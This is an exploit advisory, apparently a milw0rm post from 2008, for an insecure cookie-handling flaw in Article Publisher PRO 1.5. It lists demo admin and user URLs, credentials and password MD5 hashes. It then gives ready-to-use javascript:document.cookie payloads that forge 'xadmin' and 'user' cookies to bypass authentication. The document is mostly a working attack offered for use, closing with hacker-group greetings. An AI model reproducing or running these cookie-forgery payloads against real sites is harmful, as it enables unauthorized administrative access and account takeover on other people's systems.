[~] Article Publisher PRO Insecure Cookie Handling Vulnerability
[~]
[~] version: 1.5
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 01.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss : ) )
[~]
[~] ----------------------------------------------------------
demo admin login:
http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
demo user login:
http://demo-article-publisher-pro.phparticlescript.com/login.php
admin_name: admin
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 1
or
user_name: zorlu
passwd: zorlu
passwd_md5: 2178fb3ee4a88f946ecb68734b266c10
user_id: 6
or
user_name: demo
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 2
exploit:
admin:
javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";
user:
javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";
for demo admin: ( user_id: 1)
javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
for demo user: ( for user zorlu user_id: 6 )
javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";
for demo user: ( for user demo user_id: 2 )
javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-01]